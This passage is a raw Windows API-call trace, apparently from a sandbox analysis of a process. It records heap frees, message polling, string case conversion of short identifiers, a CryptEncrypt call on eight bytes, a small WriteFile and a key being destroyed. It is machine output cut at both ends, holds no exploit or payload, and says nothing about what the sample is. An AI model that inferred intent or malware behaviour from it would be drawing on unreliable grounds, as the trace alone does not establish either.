lpsz="SSA4F00A00447") returned 0xd [0200.326] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a780e8 | out: hHeap=0x2af0000) returned 1 [0200.326] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a48 | out: hHeap=0x2af0000) returned 1 [0200.326] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa870 | out: hHeap=0x2af0000) returned 1 [0200.326] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa840 | out: hHeap=0x2af0000) returned 1 [0200.326] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa50 | out: hHeap=0x2af0000) returned 1 [0200.326] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b98 | out: hHeap=0x2af0000) returned 1 [0200.326] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b48 | out: hHeap=0x2af0000) returned 1 [0200.326] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0200.326] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e6c0 | out: hHeap=0x2af0000) returned 1 [0200.326] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0200.326] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a48 | out: hHeap=0x2af0000) returned 1 [0200.326] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8b8 | out: hHeap=0x2af0000) returned 1 [0200.326] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa50 | out: hHeap=0x2af0000) returned 1 [0200.326] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa840 | out: hHeap=0x2af0000) returned 1 [0200.326] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b78 | out: hHeap=0x2af0000) returned 1 [0200.326] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b18 | out: hHeap=0x2af0000) returned 1 [0200.326] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0200.326] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9a8 | out: hHeap=0x2af0000) returned 1 [0200.326] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a38 | out: hHeap=0x2af0000) returned 1 [0200.326] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b58 | out: hHeap=0x2af0000) returned 1 [0200.326] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b88 | out: hHeap=0x2af0000) returned 1 [0200.326] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71aa8 | out: hHeap=0x2af0000) returned 1 [0200.326] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8a0 | out: hHeap=0x2af0000) returned 1 [0200.326] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b48 | out: hHeap=0x2af0000) returned 1 [0200.327] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b78 | out: hHeap=0x2af0000) returned 1 [0200.327] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ae8 | out: hHeap=0x2af0000) returned 1 [0200.327] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaad08 | out: hHeap=0x2af0000) returned 1 [0200.327] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaac90 | out: hHeap=0x2af0000) returned 1 [0200.327] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaad98 | out: hHeap=0x2af0000) returned 1 [0200.327] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b58 | out: hHeap=0x2af0000) returned 1 [0200.327] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71aa8 | out: hHeap=0x2af0000) returned 1 [0200.327] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78188 | out: hHeap=0x2af0000) returned 1 [0200.327] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ae8 | out: hHeap=0x2af0000) returned 1 [0200.327] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b18 | out: hHeap=0x2af0000) returned 1 [0200.327] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b48 | out: hHeap=0x2af0000) returned 1 [0200.327] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaca8 | out: hHeap=0x2af0000) returned 1 [0200.327] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaabb8 | out: hHeap=0x2af0000) returned 1 [0200.327] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaac00 | out: hHeap=0x2af0000) returned 1 [0200.327] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71af8 | out: hHeap=0x2af0000) returned 1 [0200.327] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a48 | out: hHeap=0x2af0000) returned 1 [0200.327] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a48 | out: hHeap=0x2af0000) returned 1 [0200.327] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaacf0 | out: hHeap=0x2af0000) returned 1 [0200.327] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaac00 | out: hHeap=0x2af0000) returned 1 [0200.327] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaadb0 | out: hHeap=0x2af0000) returned 1 [0200.327] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71aa8 | out: hHeap=0x2af0000) returned 1 [0200.327] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71af8 | out: hHeap=0x2af0000) returned 1 [0200.327] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719c8 | out: hHeap=0x2af0000) returned 1 [0200.327] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaab58 | out: hHeap=0x2af0000) returned 1 [0200.327] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71aa8 | out: hHeap=0x2af0000) returned 1 [0200.327] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a38 | out: hHeap=0x2af0000) returned 1 [0200.327] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaab40 | out: hHeap=0x2af0000) returned 1 [0200.327] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae10 | out: hHeap=0x2af0000) returned 1 [0200.328] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b78 | out: hHeap=0x2af0000) returned 1 [0200.328] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b88 | out: hHeap=0x2af0000) returned 1 [0200.328] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0200.328] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71aa8 | out: hHeap=0x2af0000) returned 1 [0200.328] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaac90 | out: hHeap=0x2af0000) returned 1 [0200.328] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaac00 | out: hHeap=0x2af0000) returned 1 [0200.328] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaadb0 | out: hHeap=0x2af0000) returned 1 [0200.328] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b88 | out: hHeap=0x2af0000) returned 1 [0200.328] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0200.328] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaab40 | out: hHeap=0x2af0000) returned 1 [0200.328] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71aa8 | out: hHeap=0x2af0000) returned 1 [0200.328] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaad50 | out: hHeap=0x2af0000) returned 1 [0200.328] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719c8 | out: hHeap=0x2af0000) returned 1 [0200.328] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaacf0 | out: hHeap=0x2af0000) returned 1 [0200.328] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b78 | out: hHeap=0x2af0000) returned 1 [0200.328] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaac60 | out: hHeap=0x2af0000) returned 1 [0200.328] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b88 | out: hHeap=0x2af0000) returned 1 [0200.328] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaacf0 | out: hHeap=0x2af0000) returned 1 [0200.328] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ab8 | out: hHeap=0x2af0000) returned 1 [0200.328] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaac00 | out: hHeap=0x2af0000) returned 1 [0200.328] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71af8 | out: hHeap=0x2af0000) returned 1 [0200.328] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaac60 | out: hHeap=0x2af0000) returned 1 [0200.328] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ab8 | out: hHeap=0x2af0000) returned 1 [0200.328] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaad08 | out: hHeap=0x2af0000) returned 1 [0200.328] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ae8 | out: hHeap=0x2af0000) returned 1 [0200.328] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaac00 | out: hHeap=0x2af0000) returned 1 [0200.328] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ab8 | out: hHeap=0x2af0000) returned 1 [0200.328] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaac60 | out: hHeap=0x2af0000) returned 1 [0200.328] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71af8 | out: hHeap=0x2af0000) returned 1 [0200.328] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaab40 | out: hHeap=0x2af0000) returned 1 [0200.329] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaac00 | out: hHeap=0x2af0000) returned 1 [0200.329] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ab8 | out: hHeap=0x2af0000) returned 1 [0200.329] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaac60 | out: hHeap=0x2af0000) returned 1 [0200.329] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b18 | out: hHeap=0x2af0000) returned 1 [0200.329] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0200.329] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2aaab40, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0200.329] CryptEncrypt (in: hKey=0x9e1d38, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x8cef60*=0x0, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x8cef60*=0x8) returned 1 [0200.329] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0200.329] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0200.329] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0200.329] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0200.329] CharLowerBuffW (in: lpsz="byte[8]", cchLength=0x7 | out: lpsz="byte[8]") returned 0x7 [0200.329] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0200.329] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0200.329] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0200.329] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0200.330] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0200.330] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0200.330] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0200.330] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0200.330] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0200.330] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2aaadf8, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0200.330] CryptEncrypt (in: hKey=0x9e1d38, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2a71a48*, pdwDataLen=0x8cef60*=0x0, dwBufLen=0x8 | out: pbData=0x2a71a48*, pdwDataLen=0x8cef60*=0x8) returned 1 [0200.330] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0200.330] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0200.330] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0200.330] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0200.330] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0200.347] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0200.347] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0200.347] CharUpperBuffW (in: lpsz="A170020032E", cchLength=0xb | out: lpsz="A170020032E") returned 0xb [0200.347] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0200.347] CharUpperBuffW (in: lpsz="SSA170020032E", cchLength=0xd | out: lpsz="SSA170020032E") returned 0xd [0200.347] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0200.347] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0200.347] CharUpperBuffW (in: lpsz="A0000901A0E", cchLength=0xb | out: lpsz="A0000901A0E") returned 0xb [0200.347] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0200.347] CharUpperBuffW (in: lpsz="SSA0000901A0E", cchLength=0xd | out: lpsz="SSA0000901A0E") returned 0xd [0200.347] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0200.347] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0200.347] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0200.347] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0200.347] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0200.347] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0200.347] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0200.347] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0200.347] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0200.348] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0200.348] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0200.348] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0200.348] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0200.348] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0200.348] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0200.348] WriteFile (in: hFile=0x4ec, lpBuffer=0x2a71898*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x8cf5e4, lpOverlapped=0x0 | out: lpBuffer=0x2a71898*, lpNumberOfBytesWritten=0x8cf5e4*=0x8, lpOverlapped=0x0) returned 1 [0200.349] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0200.349] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0200.349] CharUpperBuffW (in: lpsz="A4D00401A22", cchLength=0xb | out: lpsz="A4D00401A22") returned 0xb [0200.349] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0200.349] CharUpperBuffW (in: lpsz="SSA4D00401A22", cchLength=0xd | out: lpsz="SSA4D00401A22") returned 0xd [0200.349] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0200.349] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0200.349] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0200.349] PeekMessageW (in: lpMsg=0x8cedb0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedb0) returned 0 [0200.349] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0200.349] PeekMessageW (in: lpMsg=0x8cedb0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedb0) returned 0 [0200.349] PeekMessageW (in: lpMsg=0x8cedb0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedb0) returned 0 [0200.349] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0200.349] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0200.349] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x2aaa990, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyKey", lpUsedDefaultChar=0x0) returned 16 [0200.349] CryptDestroyKey (hKey=0x9e1d38) returned 1 [0200.349] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0200.349] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0200.350] CharUpperBuffW (in: lpsz="A170020032E", cchLength=0xb | out: lpsz="A170020032E") returned 0xb [0200.350] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0200.350] CharUpperBuffW (in: lpsz="SSA170020032E", cchLength=0xd | out: lpsz="SSA170020032E") returned 0xd [0200.350] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0200.350] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0200.350] CharUpperBuffW (in: lpsz="A0000901A0E", cchLength=0xb | out: lpsz="A0000901A0E") returned 0xb [0200.350] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0200.350] CharUpperBuffW (in: lpsz="SSA0000901A0E", cchLength=0xd | out: lpsz="SSA0000901A0E") returned 0xd [0200.350] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0200.350] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0200.350] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0200.350] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0200.350] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0200.350] PeekMessageW (in: lpMsg=0x8ced40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced40) returned 0 [0200.350] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0200.350] PeekMessageW (in: lpMsg=0x8ced40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced40) returned 0 [0200.350] PeekMessageW (in: lpMsg=0x8ced40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced40) returned 0 [0200.350] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0200.350] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0200.350] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0200.350] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0200.350] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0200.350] CharUpperBuffW (in: lpsz="A170020032E", cchLength=0xb | out: lpsz="A170020032E") returned 0xb [0200.350] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0200.351] CharUpperBuffW (in: lpsz="SSA170020032E", cchLength=0xd | out: lpsz="SSA170020032E") returned 0xd [0200.351] PeekMessageW (in: lpMsg=0x8cf4a8, 